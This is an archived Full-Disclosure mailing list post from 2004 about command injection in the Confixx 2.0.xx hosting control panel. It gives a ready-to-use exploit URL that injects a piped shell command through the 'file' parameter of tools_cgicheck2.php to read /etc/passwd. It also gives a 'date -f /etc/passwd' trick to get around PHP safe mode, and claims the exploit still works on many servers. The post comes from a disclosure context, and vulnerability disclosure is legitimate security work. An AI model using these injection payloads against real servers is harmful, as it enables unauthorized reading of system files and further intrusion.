[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-Disclosure] Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW

To: full-disclosure@xxxxxxxxxxxxxxxx
Subject: [Full-Disclosure] Re: Re: Confixx 2.0.xx SQL_Injections and reading MySQL Root-PW
From: checker@xxxxxxxxxxxxxxxxxxxxxxxx
Date: 10 Mar 2004 14:52:53 -0000

In the year 2003 I've successfully tested the following exploit on the 
sw-soft confixx demoversion

http://confixx-demo.sw-soft.com/user/tools_cgicheck2.php?dir=3D&file=3D%20./x%20|/bin/cat%20/etc/passwd

i am sure - it still works on many servers.

The php safemode is not really a protection against this bug because 
there a several possibilities to skip safemode (e.g. "date -f /etc/passwd").

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

Prev by Date: [Full-Disclosure] MDKSA-2004:021 - Updated mozilla packages fix multiple vulnerabilities
Next by Date: Re: [Full-Disclosure] Comcast using IPS to protect the Internet from their home user clients?
Previous by thread: Re: [Full-Disclosure] MDKSA-2004:021 - Updated mozilla packages fix multiple vulnerabilities
Next by thread: [Full-Disclosure] MDKSA-2004:020 - Updated gdk-pixbuf packages fix BMP-handling vulnerability
Index(es):
- Date
- Thread